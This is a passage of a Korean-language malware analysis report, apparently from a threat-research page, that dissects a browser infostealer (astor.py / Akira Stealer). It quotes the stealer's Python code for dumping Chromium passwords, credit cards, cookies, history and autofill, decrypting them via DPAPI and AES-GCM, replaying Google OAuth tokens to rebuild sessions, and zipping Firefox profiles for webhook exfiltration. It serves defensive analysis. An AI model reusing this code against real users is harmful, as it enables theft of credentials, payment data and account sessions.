겨냥합니다.",[861,6282,6284],{"id":6283},"_741-추출되는-데이터-유형","7.4.1 추출되는 데이터 유형",[532,6286,867],{},[1391,6288,4680,6289],{"style":4679},[1407,6290,6291,4680,6304,4680,6317,4680,6330,4680,6342,4680,6354,4680,6365],{},[1397,6292,4685,6293,4685,6297,4685,6301,4680],{},[1400,6294,6296],{"style":6295},"text-align: left; width: 22%;","데이터 유형",[1400,6298,6300],{"style":6299},"text-align: left; width: 28%;","소스 파일",[1400,6302,6303],{"style":4850},"비고",[1397,6305,4685,6306,4685,6309,4685,6314,4680],{},[1412,6307,6308],{},"저장된 암호",[1412,6310,6311,6313],{},[550,6312,556],{},"(Chromium)",[1412,6315,6316],{},"DPAPI 또는 AES-GCM(Chromium v80 이후)를 통해 복호화됨",[1397,6318,4685,6319,4685,6322,4685,6327,4680],{"style":4706},[1412,6320,6321],{},"쿠키",[1412,6323,6324],{},[550,6325,6326],{},"Cookies",[1412,6328,6329],{},"세션 토큰을 포함할 수 있으며, 특히 Google/Facebook 계정의 경우",[1397,6331,4685,6332,4685,6335,4685,6339,4680],{},[1412,6333,6334],{},"자동 완성 데이터",[1412,6336,6337],{},[550,6338,560],{},[1412,6340,6341],{},"주소, 이메일, 전화번호 등",[1397,6343,4685,6344,4685,6347,4685,6351,4680],{"style":4706},[1412,6345,6346],{},"신용카드",[1412,6348,6349],{},[550,6350,560],{},[1412,6352,6353],{},"암호화됨; 마스터 키 필요",[1397,6355,4685,6356,4685,6359,4685,6362,4680],{},[1412,6357,6358],{},"세션 토큰",[1412,6360,6361],{},"메모리 및 쿠키",[1412,6363,6364],{},"Gmail, Google 계정, Discord OAUTH 리플레이 포함",[1397,6366,4685,6367,4685,6370,4685,6378,4680],{"style":4706},[1412,6368,6369],{},"기록 및 URL",[1412,6371,6372,619,6375],{},[550,6373,6374],{},"History",[550,6376,6377],{},"Visited Links",[1412,6379,6380],{},"또한 공격자에게 유출됨",[826,6382],{"className":6383},[829,830],[532,6385,6386,6389],{},[539,6387,6388],{},"3. 추출 모듈","\n멀웨어 제작자가 브라우저를 겨냥할 때, 그들의 주된 보물창고는 Chrome, Firefox 및 그 계열이 자격 증명, 쿠키, 기록, 자동 완성 항목을 저장하는 다양한 SQLite 데이터베이스입니다. astor.py는 경량 Python과 네이티브 API를 엮어 흔적을 남기지 않고 모든 데이터를 체계적으로 뽑아내며, 심지어 라이브 OAuth 세션을 리플레이하기까지 합니다. 아래는 코드를 그대로 인용한, 모듈별 심층 안내입니다.",[861,6391,6393,6394,2013],{"id":6392},"_742-암호-덤퍼chromiumgetpasswords","7.4.2 암호 덤퍼(",[550,6395,6396],{},"Chromium.GetPasswords",[532,6398,867],{},[532,6400,6401],{},"이 모듈은 모든 Chromium 기반 브라우저 프로필을 체계적으로 검색하여 저장된 로그인 자격 증명을 추출합니다. Login Data SQLite 데이터베이스를 겨냥하여 사용자명과 암호화된 암호를 회수한 뒤, 플랫폼의 암호화 키(DPAPI 또는 AES-GCM을 통해 회수)를 사용해 이를 평문으로 복호화합니다. 이 자격 증명은 침해 후 피벗팅이나 계정 탈취에 매우 가치가 높습니다.",[587,6403,6405],{"className":4489,"code":6404,"language":4491,"meta":593,"style":593},"for root, _, files in os.walk(self.BrowserPath):\n    for file in files:\n        if file.lower() == \"login data\":\n            # Copy DB → open → extract rows\n            results = cursor.execute(\n                \"SELECT origin_url, username_value, password_value FROM logins\"\n            ).fetchall()\n            for url, user, pwd_blob in results:\n                clear_pwd = self.Decrypt(pwd_blob, encryptionKey)\n                passwords.append((url, user, clear_pwd))\n",[550,6406,6407,6412,6417,6422,6427,6432,6437,6442,6447,6452],{"__ignoreMap":593},[1679,6408,6409],{"class":1681,"line":1682},[1679,6410,6411],{},"for root, _, files in os.walk(self.BrowserPath):\n",[1679,6413,6414],{"class":1681,"line":2059},[1679,6415,6416],{},"    for file in files:\n",[1679,6418,6419],{"class":1681,"line":2065},[1679,6420,6421],{},"        if file.lower() == \"login data\":\n",[1679,6423,6424],{"class":1681,"line":2071},[1679,6425,6426],{},"            # Copy DB → open → extract rows\n",[1679,6428,6429],{"class":1681,"line":2393},[1679,6430,6431],{},"            results = cursor.execute(\n",[1679,6433,6434],{"class":1681,"line":2399},[1679,6435,6436],{},"                \"SELECT origin_url, username_value, password_value FROM logins\"\n",[1679,6438,6439],{"class":1681,"line":3055},[1679,6440,6441],{},"            ).fetchall()\n",[1679,6443,6444],{"class":1681,"line":3848},[1679,6445,6446],{},"            for url, user, pwd_blob in results:\n",[1679,6448,6449],{"class":1681,"line":3854},[1679,6450,6451],{},"                clear_pwd = self.Decrypt(pwd_blob, encryptionKey)\n",[1679,6453,6454],{"class":1681,"line":4103},[1679,6455,6456],{},"                passwords.append((url, user, clear_pwd))\n",[603,6458,6459,6472,6478,6486,6504],{},[606,6460,6461,6462,6465,6466,6468,6469,2121],{},"브라우저의 ",[550,6463,6464],{},"User Data"," 폴더 아래 모든 ",[550,6467,556],{}," SQLite 데이터베이스를 ",[539,6470,6471],{},"찾습니다",[606,6473,6474,6475,2121],{},"브라우저 잠금을 피하기 위해 임시 파일로 ",[539,6476,6477],{},"복사합니다",[606,6479,6480,974,6483,2121],{},[539,6481,6482],{},"SQL 쿼리",[550,6484,6485],{},"SELECT origin_url, username_value, password_value FROM logins",[606,6487,6488,6489,6492,6493,6496,6497,6500,6501,2121],{},"각 ",[550,6490,6491],{},"password_value"," 블롭을 AES-GCM(",[550,6494,6495],{},"v10","/",[550,6498,6499],{},"v11",") 또는 Windows DPAPI 대체를 통해 ",[539,6502,6503],{},"복호화합니다",[606,6505,6506,6507,6510,6511,2121],{},"출력을 ",[550,6508,6509],{},"Passwords/\u003CBrowserName> Passwords.txt","에 ",[539,6512,6513],{},"기록합니다",[861,6515,6517,6518,2013],{"id":6516},"_743-신용카드-덤퍼chromiumgetcreditcards","7.4.3 신용카드 덤퍼(",[550,6519,6520],{},"Chromium.GetCreditCards",[532,6522,867],{},[532,6524,6525],{},"여기서 스틸러는 각 브라우저 프로필의 Web Data 파일에서 저장된 신용카드 데이터에 접근합니다. 만료 정보와 암호화된 신용카드 번호를 추출하는 데 초점을 맞추며, 이후 암호와 동일한 로직으로 복호화됩니다. CVV 코드는 일반적으로 저장되지 않지만, 복구된 정보는 여전히 카드 비대면(card-not-present) 사기에 악용될 수 있습니다.",[587,6527,6529],{"className":4489,"code":6528,"language":4491,"meta":593,"style":593},"results = cursor.execute(\n    \"SELECT expiration_month, expiration_year, card_number_encrypted FROM credit_cards\"\n).fetchall()\nfor month, year, enc_cc in results:\n    cc_number = self.Decrypt(enc_cc, encryptionKey)\n    ccs.append((cc_number, month, year))\n",[550,6530,6531,6536,6541,6546,6551,6556],{"__ignoreMap":593},[1679,6532,6533],{"class":1681,"line":1682},[1679,6534,6535],{},"results = cursor.execute(\n",[1679,6537,6538],{"class":1681,"line":2059},[1679,6539,6540],{},"    \"SELECT expiration_month, expiration_year, card_number_encrypted FROM credit_cards\"\n",[1679,6542,6543],{"class":1681,"line":2065},[1679,6544,6545],{},").fetchall()\n",[1679,6547,6548],{"class":1681,"line":2071},[1679,6549,6550],{},"for month, year, enc_cc in results:\n",[1679,6552,6553],{"class":1681,"line":2393},[1679,6554,6555],{},"    cc_number = self.Decrypt(enc_cc, encryptionKey)\n",[1679,6557,6558],{"class":1681,"line":2399},[1679,6559,6560],{},"    ccs.append((cc_number, month, year))\n",[603,6562,6563,6572,6579,6587],{},[606,6564,6565,6566,6568,6569,2121],{},"각 프로필 아래의 ",[550,6567,560],{}," SQLite 저장소를 ",[539,6570,6571],{},"겨냥합니다",[606,6573,6574,974,6576,2121],{},[539,6575,6482],{},[550,6577,6578],{},"SELECT expiration_month, expiration_year, card_number_encrypted FROM credit_cards",[606,6580,6581,6584,6585,2121],{},[550,6582,6583],{},"card_number_encrypted","를 암호 블롭과 정확히 동일하게 ",[539,6586,6503],{},[606,6588,6589,6592,6593,2121],{},[550,6590,6591],{},"CreditCards/\u003CBrowserName> CreditCards.txt","로 ",[539,6594,6595],{},"출력합니다",[861,6597,6599,6600,2013],{"id":6598},"_744-쿠키-덤퍼chromiumgetcookies","7.4.4 쿠키 덤퍼(",[550,6601,6602],{},"Chromium.GetCookies",[532,6604,867],{},[532,6606,6607],{},"쿠키, 특히 세션 쿠키는 암호 없이 계정을 하이재킹하는 데 최우선 표적입니다. 이 모듈은 프로필 전반의 모든 쿠키 파일을 덤프하고, 복호화하며, 도메인, 이름, 만료 같은 필수 메타데이터를 수집합니다. 지문 채취와 결합하면, 이 쿠키들은 인증된 서비스에 대한 원활한 리플레이 공격을 가능하게 할 수 있습니다.",[587,6609,6611],{"className":4489,"code":6610,"language":4491,"meta":593,"style":593},"results = cursor.execute(\n    \"SELECT host_key, name, path, encrypted_value, expires_utc FROM cookies\"\n).fetchall()\nfor host, name, path, blob, expiry in results:\n    cookie_val = self.Decrypt(blob, encryptionKey)\n    cookies.append((host, name, path, cookie_val, expiry))\n",[550,6612,6613,6617,6622,6626,6631,6636],{"__ignoreMap":593},[1679,6614,6615],{"class":1681,"line":1682},[1679,6616,6535],{},[1679,6618,6619],{"class":1681,"line":2059},[1679,6620,6621],{},"    \"SELECT host_key, name, path, encrypted_value, expires_utc FROM cookies\"\n",[1679,6623,6624],{"class":1681,"line":2065},[1679,6625,6545],{},[1679,6627,6628],{"class":1681,"line":2071},[1679,6629,6630],{},"for host, name, path, blob, expiry in results:\n",[1679,6632,6633],{"class":1681,"line":2393},[1679,6634,6635],{},"    cookie_val = self.Decrypt(blob, encryptionKey)\n",[1679,6637,6638],{"class":1681,"line":2399},[1679,6639,6640],{},"    cookies.append((host, name, path, cookie_val, expiry))\n",[603,6642,6643,6651,6660,6670],{},[606,6644,6645,6646,6468,6648,2121],{},"모든 ",[550,6647,6326],{},[539,6649,6650],{},"스캔합니다",[606,6652,6653,6656,6657,2121],{},[550,6654,6655],{},"host_key, name, path, encrypted_value, expires_utc","를 ",[539,6658,6659],{},"선택합니다",[606,6661,6488,6662,6665,6666,6669],{},[550,6663,6664],{},"encrypted_value"," 블롭을 ",[539,6667,6668],{},"복호화하여"," 실제 쿠키 문자열을 드러냅니다.",[606,6671,6672,6510,6675,2121],{},[550,6673,6674],{},"Cookies/\u003CBrowserName> Cookies.txt",[539,6676,6677],{},"저장합니다",[861,6679,6681,6682,2013],{"id":6680},"_745-google-세션-덤퍼chromiumdump_google_sessions","7.4.5 Google 세션 덤퍼(",[550,6683,6684],{},"Chromium.dump_google_sessions",[532,6686,867],{},[532,6688,6689],{},"더 발전된 구성 요소 중 하나인 이 루틴은 token_service 테이블에서 저장된 OAuth 토큰을 복호화합니다. Google의 multilogin 엔드포인트를 통해 이를 리플레이함으로써, 멀웨어는 활성 세션 쿠키를 재생성할 수 있어 공격자가 자격 증명 없이 Google 계정을 하이재킹할 수 있게 합니다. 이는 현대 스틸러에서 액세스 토큰이 어떻게 최우선 표적이 되었는지를 잘 보여 줍니다.",[587,6691,6693],{"className":4489,"code":6692,"language":4491,"meta":593,"style":593},"cursor.execute(\"SELECT service, encrypted_token FROM token_service\")\nfor service, blob in cursor.fetchall():\n    iv = blob[3:15]\n    ciphertext = blob[15:-16]\n    cipher = AES.new(secret_key, AES.MODE_GCM, iv)\n    token = cipher.decrypt(ciphertext).decode()\n    # Replays via POST to OAuth endpoint\n    response = requests.post(\n        \"https://accounts.google.com/oauth/multilogin\",\n        headers={\"Authorization\": f\"MultiBearer {token}:{service_id}\"},\n        data={\"source\": \"com.google.Drive\"}\n    )\n    save each account’s cookies to file\n",[550,6694,6695,6700,6705,6710,6715,6720,6725,6730,6735,6740,6745,6750,6754],{"__ignoreMap":593},[1679,6696,6697],{"class":1681,"line":1682},[1679,6698,6699],{},"cursor.execute(\"SELECT service, encrypted_token FROM token_service\")\n",[1679,6701,6702],{"class":1681,"line":2059},[1679,6703,6704],{},"for service, blob in cursor.fetchall():\n",[1679,6706,6707],{"class":1681,"line":2065},[1679,6708,6709],{},"    iv = blob[3:15]\n",[1679,6711,6712],{"class":1681,"line":2071},[1679,6713,6714],{},"    ciphertext = blob[15:-16]\n",[1679,6716,6717],{"class":1681,"line":2393},[1679,6718,6719],{},"    cipher = AES.new(secret_key, AES.MODE_GCM, iv)\n",[1679,6721,6722],{"class":1681,"line":2399},[1679,6723,6724],{},"    token = cipher.decrypt(ciphertext).decode()\n",[1679,6726,6727],{"class":1681,"line":3055},[1679,6728,6729],{},"    # Replays via POST to OAuth endpoint\n",[1679,6731,6732],{"class":1681,"line":3848},[1679,6733,6734],{},"    response = requests.post(\n",[1679,6736,6737],{"class":1681,"line":3854},[1679,6738,6739],{},"        \"https://accounts.google.com/oauth/multilogin\",\n",[1679,6741,6742],{"class":1681,"line":4103},[1679,6743,6744],{},"        headers={\"Authorization\": f\"MultiBearer {token}:{service_id}\"},\n",[1679,6746,6747],{"class":1681,"line":5028},[1679,6748,6749],{},"        data={\"source\": \"com.google.Drive\"}\n",[1679,6751,6752],{"class":1681,"line":5034},[1679,6753,5958],{},[1679,6755,6756],{"class":1681,"line":5040},[1679,6757,6758],{},"    save each account’s cookies to file\n",[603,6760,6761,6777,6786,6797],{},[606,6762,6763,6765,6766,6769,6770,6773,6774,2121],{},[550,6764,560],{}," 복제본에서 ",[550,6767,6768],{},"service","와 원시 ",[550,6771,6772],{},"encrypted_token","을 ",[539,6775,6776],{},"가져옵니다",[606,6778,6461,6779,6782,6783,2121],{},[550,6780,6781],{},"Local State"," 키를 사용한 ",[539,6784,6785],{},"AES-GCM 복호화",[606,6787,6788,6789,6792,6793,6796],{},"복호화된 토큰을 Google의 ",[550,6790,6791],{},"multilogin"," API에 POST로 ",[539,6794,6795],{},"리플레이하여"," 유효한 OAuth 쿠키를 재구성합니다.",[606,6798,6799,6802,6803,2121],{},[550,6800,6801],{},"Cookies/\u003Cdisplay_email> Google Session.txt"," 아래에 계정별 세션 파일을 ",[539,6804,6513],{},[861,6806,6808,6809,2013],{"id":6807},"_746-기록-덤퍼chromiumgethistory","7.4.6 기록 덤퍼(",[550,6810,6811],{},"Chromium.GetHistory",[532,6813,867],{},[532,6815,6816],{},"이 함수는 URL, 제목, 방문 빈도를 포함한 브라우징 기록 항목을 추출합니다. 프라이버시 침해를 넘어, 이 데이터는 공격자가 피해자의 행동을 이해하고, 고가치 표적(예: 뱅킹 포털)을 식별하거나, 소셜 엔지니어링 페이로드를 맞춤화하는 데 도움을 줍니다.",[587,6818,6820],{"className":4489,"code":6819,"language":4491,"meta":593,"style":593},"results = cursor.execute(\n    \"SELECT url, title, visit_count, last_visit_time FROM urls\"\n).fetchall()\nhistory.sort(key=lambda x: x[3], reverse=True)\nreturn [(url, title, count) for url, title, count, _ in history]\n",[550,6821,6822,6826,6831,6835,6840],{"__ignoreMap":593},[1679,6823,6824],{"class":1681,"line":1682},[1679,6825,6535],{},[1679,6827,6828],{"class":1681,"line":2059},[1679,6829,6830],{},"    \"SELECT url, title, visit_count, last_visit_time FROM urls\"\n",[1679,6832,6833],{"class":1681,"line":2065},[1679,6834,6545],{},[1679,6836,6837],{"class":1681,"line":2071},[1679,6838,6839],{},"history.sort(key=lambda x: x[3], reverse=True)\n",[1679,6841,6842],{"class":1681,"line":2393},[1679,6843,6844],{},"return [(url, title, count) for url, title, count, _ in history]\n",[603,6846,6847,6857,6867],{},[606,6848,6645,6849,6851,6852,6773,6855,2121],{},[550,6850,6374],{}," DB에서 ",[550,6853,6854],{},"url, title, visit_count, last_visit_time",[539,6856,6659],{},[606,6858,6859,6860,6863,6864,2121],{},"항목을 ",[550,6861,6862],{},"last_visit_time"," 내림차순으로 ",[539,6865,6866],{},"정렬합니다",[606,6868,6869,6592,6872,2121],{},[550,6870,6871],{},"History/\u003CBrowserName> History.txt",[539,6873,6595],{},[861,6875,6877,6878,2013],{"id":6876},"_747-자동-완성-덤퍼chromiumgetautofills","7.4.7 자동 완성 덤퍼(",[550,6879,6880],{},"Chromium.GetAutofills",[532,6882,867],{},[532,6884,6885],{},"주소, 이름, 이메일, 때로는 결제 관련 데이터 같은 자동 완성 항목은 브라우저의 Web Data 저장소에서 긁어옵니다. 이 값들은 중요해 보이지 않을 수 있지만, 집계하면 피해자의 정체성과 행동에 대한 풍부한 프로필을 제공합니다.",[587,6887,6889],{"className":4489,"code":6888,"language":4491,"meta":593,"style":593},"results = cursor.execute(\n    \"SELECT name, value FROM autofill\"\n).fetchall()\nfor field, value in results:\n    autofills.append((field.strip(), value.strip()))\n",[550,6890,6891,6895,6900,6904,6909],{"__ignoreMap":593},[1679,6892,6893],{"class":1681,"line":1682},[1679,6894,6535],{},[1679,6896,6897],{"class":1681,"line":2059},[1679,6898,6899],{},"    \"SELECT name, value FROM autofill\"\n",[1679,6901,6902],{"class":1681,"line":2065},[1679,6903,6545],{},[1679,6905,6906],{"class":1681,"line":2071},[1679,6907,6908],{},"for field, value in results:\n",[1679,6910,6911],{"class":1681,"line":2393},[1679,6912,6913],{},"    autofills.append((field.strip(), value.strip()))\n",[603,6915,6916,6927],{},[606,6917,6918,6921,6922,6656,6925,2121],{},[550,6919,6920],{},"web data"," 파일에서 폼 채우기 항목 ",[550,6923,6924],{},"name, value",[539,6926,6776],{},[606,6928,6929,6592,6932,2121],{},[550,6930,6931],{},"Autofill/\u003CBrowserName> Autofill.txt",[539,6933,6513],{},[861,6935,6937,6938,6940,6941,2013],{"id":6936},"_748-firefox-프로필-그래버geckodriver-grabfirefoxprofiles","7.4.8 Firefox 프로필 그래버(",[550,6939,6246],{}," & ",[550,6942,6943],{},"grabFirefoxProfiles",[532,6945,867],{},[532,6947,6948],{},"세분화된 Chromium 루틴과 달리, 이 함수는 광범위한 접근을 택합니다. 저장된 로그인, 쿠키, 북마크를 포함한 전체 Firefox 프로필 디렉터리를 압축하여 통째로 유출합니다. 이는 공격자가 알려진 NSS 도구로 복호화 장벽을 우회하며 오프라인에서 데이터를 분석하거나 추출할 수 있게 합니다.",[587,6950,6952],{"className":4489,"code":6951,"language":4491,"meta":593,"style":593},"with zipfile.ZipFile(zip_path, 'w') as zipf:\n    for root, dirs, files in os.walk(source_path):\n        zipf.write(each file)\n# Upload via GoFile/File.io, then POST via attacker webhooks\n",[550,6953,6954,6959,6964,6969],{"__ignoreMap":593},[1679,6955,6956],{"class":1681,"line":1682},[1679,6957,6958],{},"with zipfile.ZipFile(zip_path, 'w') as zipf:\n",[1679,6960,6961],{"class":1681,"line":2059},[1679,6962,6963],{},"    for root, dirs, files in os.walk(source_path):\n",[1679,6965,6966],{"class":1681,"line":2065},[1679,6967,6968],{},"        zipf.write(each file)\n",[1679,6970,6971],{"class":1681,"line":2071},[1679,6972,6973],{},"# Upload via GoFile/File.io, then POST via attacker webhooks\n",[603,6975,6976,6986,6997],{},[606,6977,6978,6979,6982,6983,2121],{},"전체 ",[550,6980,6981],{},"%APPDATA%\\Mozilla\\Firefox\\Profiles"," 디렉터리를 ",[539,6984,6985],{},"압축합니다",[606,6987,6988,6989,6992,6993,6996],{},"이를 ",[550,6990,6991],{},"%TEMP%\\\u003CComputerName>_Firefox_profiles.zip","으로 ",[539,6994,6995],{},"명명하고"," 동일한 웹훅 채널로 다운로드 링크를 전송합니다.",[606,6998,6999,7002,7003,619,7006,619,7009,7012],{},[539,7000,7001],{},"또한"," 이미 존재하는 NSS 복호화 루틴을 사용해 각 Firefox 프로필에 대해 동일한 SQLite 기반 추출 함수(",[550,7004,7005],{},"logins.json",[550,7007,7008],{},"cookies.sqlite",[550,7010,7011],{},"places.sqlite",")를 호출합니다.",[861,7014,7016],{"id":7015},"_749-추출-요약","7.4.9 추출 요약",[532,7018,867],{},[532,7020,7021,7022,619,7024,619,7026,619,7028,619,7030,7033,7034,7037,7038,7040,7041,619,7043,619,7045,7047,7048,7051],{},"Astor.py는 Chromium 기반 및 Firefox 클라이언트 전반에서 모든 자격 증명과 세션 아티팩트를 체계적으로 수집하여 포괄적인 브라우저 침해를 오케스트레이션합니다. 각 SQLite 저장소(",[550,7023,556],{},[550,7025,560],{},[550,7027,6326],{},[550,7029,6374],{},[550,7031,7032],{},"autofill",")를 찾아 안전하게 복사한 뒤, 표적 SQL 쿼리를 실행하여 URL, 사용자명, 암호, 신용카드 정보, 쿠키, 브라우징 기록, 폼 채우기 항목을 추출합니다. 암호와 결제 데이터는 AES-GCM(또는 Windows DPAPI 대체)을 통해 복호화되며, 쿠키도 마찬가지로 풀려 평문 값을 드러냅니다. Google 계정의 경우, ",[550,7035,7036],{},"token_service","에서 나온 암호화된 OAuth 토큰이 복호화되어 ",[550,7039,6791],{}," API에 리플레이되어 라이브 세션 쿠키를 재생성합니다. 마지막으로 Firefox 프로필은 통째로 아카이브되어(",[550,7042,7005],{},[550,7044,7008],{},[550,7046,7011],{}," 포함) ZIP으로 전달되며, 어떤 아티팩트도 남기지 않습니다. 이 엔드투엔드 파이프라인은 ",[550,7049,7050],{},"%TEMP%\\\u003CComputerName>"," 아래에서 조용히 실행되며, 모든 데이터 범주에 대해 깔끔하게 정리된 출력 파일을 생성합니다.",[713,7053,7055],{"id":7054},"_75-복호화-로직","7.5 복호화 로직",[532,7057,719],{},[532,7059,7060],{},"Chrome이나 Edge 같은 현대 브라우저는 암호, 쿠키, 신용카드 정보 같은 민감 데이터를 로컬에 저장하기 전에 암호화합니다. Akira에는 레거시와 현재의 Chromium 암호화 방식을 모두 처리하도록 맞춤화된 내장 복호화 루틴이 포함되어 있습니다. 이는 시스템의 패치 수준이나 브라우저 버전과 무관하게 평문 데이터를 추출할 수 있도록 보장합니다.",[532,7062,7063],{},"이 과정의 핵심은 Local State라는 파일에 저장된 브라우저의 마스터 암호화 키를 추출하고 복호화하는 것입니다. 브라우저 버전과 Windows 빌드에 따라, Akira는 적절한 복호화 방법을 동적으로 선택합니다:",[532,7065,7066],{},"DPAPI(Data Protection API)는 오래된 시스템에서 사용되며, Chrome이 현재 사용자의 Windows 자격 증명으로 보호되는 비밀을 저장하는 방식입니다.",[532,7068,7069],{},"AES-GCM은 현대 Chromium 빌드에서 사용되며, 무작위로 생성된 마스터 키 자체가 DPAPI로 암호화된 뒤, 사용자 데이터의 앱 내 암호화에 사용됩니다.",[532,7071,7072],{},"Local State 마스터 키를 먼저 복호화함으로써, Akira는 모든 브라우저 비밀을 잠금 해제할 수 있는 능력을 얻고, 자격 증명, 토큰, 쿠키 등을 추출하는 길을 엽니다.",[532,7074,7075],{},[539,7076,7077],{},"키 추출",[587,7079,7081],{"className":4489,"code":7080,"language":4491,"meta":593,"style":593},"local_state_path = os.path.join(user_path, \"Local State\")\nwith open(local_state_path, \"r\", encoding=\"utf-8\") as f:\n    local_state = json.load(f)\nmaster_key = base64.b64decode(local_state[\"os_crypt\"][\"encrypted_key\"])\n",[550,7082,7083,7088,7093,7098],{"__ignoreMap":593},[1679,7084,7085],{"class":1681,"line":1682},[1679,7086,7087],{},"local_state_path = os.path.join(user_path, \"Local State\")\n",[1679,7089,7090],{"class":1681,"line":2059},[1679,7091,7092],{},"with open(local_state_path, \"r\", encoding=\"utf-8\") as f:\n",[1679,7094,7095],{"class":1681,"line":2065},[1679,7096,7097],{},"    local_state = json.load(f)\n",[1679,7099,7100],{"class":1681,"line":2071},[1679,7101,7102],{},"master_key = base64.b64decode(local_state[\"os_crypt\"][\"encrypted_key\"])\n",[532,7104,7105],{},[539,7106,7107],{},"복호화(AES-GCM):",[587,7109,7111],{"className":4489,"code":7110,"language":4491,"meta":593,"style":593},"nonce = value[3:15]\nciphertext = value[15:-16]\ntag = value[-16:]\ncipher = AES.new(aes_key, AES.MODE_GCM, nonce=nonce)\ndecrypted = cipher.decrypt_and_verify(ciphertext, tag)\n",[550,7112,7113,7118,7123,7128,7133],{"__ignoreMap":593},[1679,7114,7115],{"class":1681,"line":1682},[1679,7116,7117],{},"nonce = value[3:15]\n",[1679,7119,7120],{"class":1681,"line":2059},[1679,7121,7122],{},"ciphertext = value[15:-16]\n",[1679,7124,7125],{"class":1681,"line":2065},[1679,7126,7127],{},"tag = value[-16:]\n",[1679,7129,7130],{"class":1681,"line":2071},[1679,7131,7132],{},"cipher = AES.new(aes_key, AES.MODE_GCM, nonce=nonce)\n",[1679,7134,7135],{"class":1681,"line":2393},[1679,7136,7137],{},"decrypted = cipher.decrypt_and_verify(ciphertext, tag)\n",[532,7139,7140,7141,7144],{},"DPAPI로의 대체가 필요한 경우(오래된 시스템에서), ",[550,7142,7143],{},"win32crypt.CryptUnprotectData()","를 사용합니다.",[532,7146,7147,7153],{},[539,7148,7149,7152],{},[550,7150,7151],{},"decrypt_password_blob"," 설명:","\n이 함수는 Akira Stealer가 Chromium 기반 브라우저에서 저장된 각 암호 값을 어떻게 복호화하는지 보여 줍니다. 두 가지 경우를 처리합니다:",[2079,7155,7156,7166],{},[606,7157,7158,7161,7162,7165],{},[539,7159,7160],{},"Windows DPAPI 블롭","(오래되었거나 GCM으로 암호화되지 않은 데이터): 사용자의 Windows 자격 증명을 사용해 복호화하는 시스템 호출 ",[550,7163,7164],{},"CryptUnprotectData","로 되돌아갑니다.",[606,7167,7168,7171,7172,7175],{},[539,7169,7170],{},"AES-GCM 암호화 블롭","(Chrome v10/v11 형식): 버전 헤더를 파싱하고, IV와 인증 태그를 추출하며, ",[550,7173,7174],{},"cryptography"," 라이브러리를 사용해 페이로드를 안전하게 복호화합니다.",[587,7177,7179],{"className":4489,"code":7178,"language":4491,"meta":593,"style":593},"from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\nfrom cryptography.hazmat.backends import default_backend\n\n\ndef decrypt_password_blob(buffer: bytes, key: bytes) -> str:\n    \"\"\"\n    Decrypts a Chrome password blob using either DPAPI or AES-GCM.\n\n    Parameters:\n    - buffer: raw encrypted blob from the `password_value` field\n    - key: the master AES key retrieved via DPAPI from Local State\n\n    Returns:\n    - Decrypted UTF-8 plaintext password\n    \"\"\"\n    # 1) DPAPI fallback for non-AES-GCM blobs\n    if not buffer.startswith((b'v10', b'v11')):\n        # Uses Windows CryptUnprotectData under the hood\n        return CryptUnprotectData(buffer)\n\n    # 2) AES-GCM decryption for Chrome v10/v11 format:\n    # Bytes layout:\n    # [0:3]    = version header ('v10'/'v11')\n    # [3:15]   = initialization vector (IV)\n    # [15:-16] = ciphertext payload\n    # [-16:]   = GCM authentication tag\n    iv = buffer[3:15]\n    ciphertext = buffer[15:-16]\n    tag = buffer[-16:]\n\n    # Initialize AES-GCM cipher with extracted IV and tag\n    cipher = Cipher(\n        algorithms.AES(key),\n        modes.GCM(iv, tag),\n        backend=default_backend()\n    )\n    decryptor = cipher.decryptor()\n\n    # Perform decryption; raises if authentication fails\n    plaintext = decryptor.update(ciphertext) + decryptor.finalize()\n\n    # Decode to UTF-8, ignoring any stray errors\n    return plaintext.decode('utf-8', errors='ignore')\n",[550,7180,7181,7186,7191,7195,7199,7204,7208,7213,7217,7222,7227,7232,7236,7241,7246,7250,7255,7260,7265,7270,7274,7279,7284,7289,7294,7299,7304,7309,7314,7319,7323,7328,7333,7338,7343,7348,7352,7357,7361,7366,7371,7375,7380],{"__ignoreMap":593},[1679,7182,7183],{"class":1681,"line":1682},[1679,7184,7185],{},"from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\n",[1679,7187,7188],{"class":1681,"line":2059},[1679,7189,7190],{},"from cryptography.hazmat.backends import default_backend\n",[1679,7192,7193],{"class":1681,"line":2065},[1679,7194,3845],{"emptyLinePlaceholder":325},[1679,7196,7197],{"class":1681,"line":2071},[1679,7198,3845],{"emptyLinePlaceholder":325},[1679,7200,7201],{"class":1681,"line":2393},[1679,7202,7203],{},"def decrypt_password_blob(buffer: bytes, key: bytes) -> str:\n",[1679,7205,7206],{"class":1681,"line":2399},[1679,7207,5832],{},[1679,7209,7210],{"class":1681,"line":3055},[1679,7211,7212],{},"    Decrypts a Chrome password blob using either DPAPI or AES-GCM.\n",[1679,7214,7215],{"class":1681,"line":3848},[1679,7216,3845],{"emptyLinePlaceholder":325},[1679,7218,7219],{"class":1681,"line":3854},[1679,7220,7221],{},"    Parameters:\n",[1679,7223,7224],{"class":1681,"line":4103},[1679,7225,7226],{},"    - buffer: raw encrypted blob from the `password_value` field\n",[1679,7228,7229],{"class":1681,"line":5028},[1679,7230,7231],{},"    - key: the master AES key retrieved via DPAPI from Local State\n",[1679,7233,7234],{"class":1681,"line":5034},[1679,7235,3845],{"emptyLinePlaceholder":325},[1679,7237,7238],{"class":1681,"line":5040},[1679,7239,7240],{},"    Returns:\n",[1679,7242,7243],{"class":1681,"line":5046},[1679,7244,7245],{},"    - Decrypted UTF-8 plaintext password\n",[1679,7247,7248],{"class":1681,"line":5052},[1679,7249,5832],{},[1679,7251,7252],{"class":1681,"line":5058},[1679,7253,7254],{},"    # 1) DPAPI fallback for non-AES-GCM blobs\n",[1679,7256,7257],{"class":1681,"line":5064},[1679,7258,7259],{},"    if not buffer.startswith((b'v10', b'v11')):\n",[1679,7261,7262],{"class":1681,"line":5070},[1679,7263,7264],{},"        # Uses Windows CryptUnprotectData under the hood\n",[1679,7266,7267],{"class":1681,"line":5076},[1679,7268,7269],{},"        return CryptUnprotectData(buffer)\n",[1679,7271,7272],{"class":1681,"line":5082},[1679,7273,3845],{"emptyLinePlaceholder":325},[1679,7275,7276],{"class":1681,"line":5088},[1679,7277,7278],{},"    # 2) AES-GCM decryption for Chrome v10/v11 format:\n",[1679,7280,7281],{"class":1681,"line":5094},[1679,7282,7283],{},"    # Bytes layout:\n",[1679,7285,7286],{"class":1681,"line":5100},[1679,7287,7288],{},"    # [0:3]    = version header ('v10'/'v11')\n",[1679,7290,7291],{"class":1681,"line":5106},[1679,7292,7293],{},"    # [3:15]   = initialization vector 